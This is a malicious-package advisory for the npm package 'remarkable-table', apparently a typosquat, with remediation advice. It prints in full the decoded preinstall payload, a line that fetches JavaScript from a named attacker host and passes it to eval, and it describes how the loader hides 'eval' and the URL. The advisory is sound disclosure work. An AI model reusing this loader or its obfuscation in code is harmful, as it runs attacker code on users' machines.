npm · Malicious package advisory
Malwareremarkable-table
MAL-2026-10447
Malicious code in remarkable-table (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (464cab930bcf948abf49517f78a3ee1abb8b89c8f9c90f199bd3446c902d8e1e)
The package's preinstall script runs index.d.js, which reconstructs the identifier 'eval' from a character-code array ([101,118,97,108]) and base64-decodes an embedded payload that resolves to `(async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();`. On `npm install`, the package performs an outbound HTTPS request to everydaynodechecker-39143n.vercel.app and passes the response body to eval, executing arbitrary attacker-controlled JavaScript on the installer's machine. Both the sink (eval) and the destination are obfuscated to evade casual review. The destination is unrelated to any legitimate table/markdown functionality, and the package name is a typosquat of the widely used `markdown-table`.
## Source: ghsa-malware (440ccabe384f89b7538fe684b1bb7fc5490d08bc49f83659808230ea46b07574)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Compromised versions (1)
- 2.4.11
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.